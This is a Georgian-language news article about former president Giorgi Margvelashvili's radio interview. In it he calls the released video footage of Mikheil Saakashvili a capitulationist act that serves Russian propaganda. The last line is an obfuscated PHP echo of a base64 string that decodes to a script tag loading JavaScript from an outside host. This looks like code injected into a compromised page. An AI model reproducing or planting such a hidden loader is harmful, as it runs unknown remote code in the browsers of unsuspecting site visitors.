celsiusi
ავერსი საქკაბელი
საქართველოს მეოთხე პრეზიდენტმა გიორგი მარგველაშვილმა რადიო მაესტროსთან ექსკლუზიურ ინტერვიუში განაცხადა, რომ საქართველოს მესამე პრეზიდენტ მიხეილ სააკაშვილთან  დაკავშირებით გავრცელებული ვიდეო კადრები  იყო რაღაც ჯგუფის მიერ გაკეთებული კაპიტულანტური აქტი.
 
ინტერვიუს დასაწყისში, საქართველოს მეოთხე პრეზიდენტმა მის მიერ ტვიტერზე გამოქვეყნებული შეფასებაც განმარტა, სადაც გიორგი მარგველაშვილი წერდა: „დიახ, ეს ქართველებმა გააკეთეს, მაგრამ ამ ქართველებს თქვენ უხდით“. მარგველაშვილი ამბობს, რომ ის ადამიანები ვისაც ამ კადრების გავრცელება და ატვირთვა მოუვიდა თავში, „ისინი ცნობიერად ან შესაძლოა არაცნობიერად, მუშაობენ რუსული პროპაგანდისტული მანქანის ერთგულ მიმწოდებლებად“.
 
„ადამიანი, ვინც არ გაითვალისწინებს იმ სიფაქიზეს, რომელიც არის ქართულ სულში რუსულ ოკუპაციასთან მიმართებაში, არ გაითვალისწინებს იმ პროპაგანდას რომელსაც იყენებს ხოლმე ჩვენს დასამცირებლად, ასეთი ადამიანი მუშაობს რუსულ ინტერესებზე. გადაწყვეტილების მიღების იმ ჯაჭვში შეუძლებელია არ ყოფილიყო ადამიანი, რომელიც რუსულ ინტერესებს ემსახურება“, - თქვა მარგველაშვილმა.
 
მისივე თქმით, სახელმწიფომ იმოქმედა თავიდან ბოლომდე რუსული პროპაგანდის სასარგებლოდ.
 
„რომელმა რგოლმა რა მოტივაციით მიიღო ეს გადაწყვეტილება, შესაძლოა როდისმე აღმოვაჩინოთ, მაგრამ ჩემი მთავარი მოტივაცია არის, რომ რუსეთს არ ეგონოთ, რომ საქართველო არის დაჩოქებული და შეშინებული, რომ ვფუთავთ და ვაწვდით ჩენს ყოფილ მთავარსარდალს. ეს არ მინდა რომ შეეშალოთ რუსებს.
 
მეოთხე პრეზიდენტი საერთაშორისო არენაზე რუსეთის პოზიციებზე საუბრობს და ამბობს, რომ რუსეთი დღეს ძლიერ ხაზზეა, ამერიკის არა ჩამოყალიბებული აქცენტებისა და ევროპის არააქტიური უნარი შეაჩეროს რუსული ექსპანსია, ამ ფონზე რუსეთი არ არის შესუსტებული საერთაშორისო არენაზე, პირიქით გაძლიერებულია. ამ ვითარებაში არ მინდა რუსეთს გაუჩნდეს ილუზია, რომ საქართველო მზად არის კაპიტულაციისთვის. ასე არ არის... ახლა შეიძლებოდა ემოცია გაჩენილიყო იმ კადრებთ, რომელიც სამწუხაროდ ქართულმა სახელმწიფომ დადო მსოფლიოს დასანახად.
 
„აქვე მინდა როგორც რუსეთმა, ასევე საერთაშორიო პარტნიორებმა იცოდნენ, რომ ჩვენ ყოველთვის თავისუფლებისთვის და დამოუკიდებლობისთვის ვიბრძოდით, არა მარტო მაშინ როდესაც ევროკავშირი და ნატოს მეგობარი ქვეყნების ნაწილი გავხდით, არამედ მანამდეც, სანამ ევროკავშირი და ნატო არსებობდა, სანამ ევროპა არსებობდა... ეს გაუტეხელობა ქართული სულის მინდა, რომ დაინახოს რუსმაც და ჩვენმა პარტნიორებმაც და არ შეეშალოთ, რომ ეს იყო კაპიტულანტური...., ეს იყო რაღაცა ჩგუფის მიერ გაკეთებული კაპიტულანტური აქტი“, - განაცხადა გიორგი მარგველაშვილმა.
 
1047
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");